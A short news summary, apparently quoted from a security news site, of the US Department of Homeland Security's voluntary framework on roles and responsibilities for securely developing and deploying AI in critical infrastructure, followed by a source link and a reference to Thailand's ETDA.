"The US Department of Homeland Security (DHS) has released recommendations that outline how to securely develop and deploy artificial intelligence (AI) in critical infrastructure. The recommendations apply to all players in the AI supply chain, starting with cloud and compute infrastructure providers, to AI developers, and all the way to critical infrastructure owners and operators. Recommendations for civil society and public-sector organizations are also provided. The voluntary recommendations in "Roles and Responsibilities Framework for Artificial Intelligence in Critical Infrastructure" look at each of the roles across five key areas: securing environments, driving responsible model and system design, implementing data governance, ensuring safe and secure deployment, and monitoring performance and impact. There are also technical and process recommendations to enhance the safety, security, and trustworthiness of AI systems."
https://www.darkreading.com/cloud-security/dhs-releases-secure-ai-framework-critical-infrastructure
References
Electronic Transactions Development Agency (ETDA)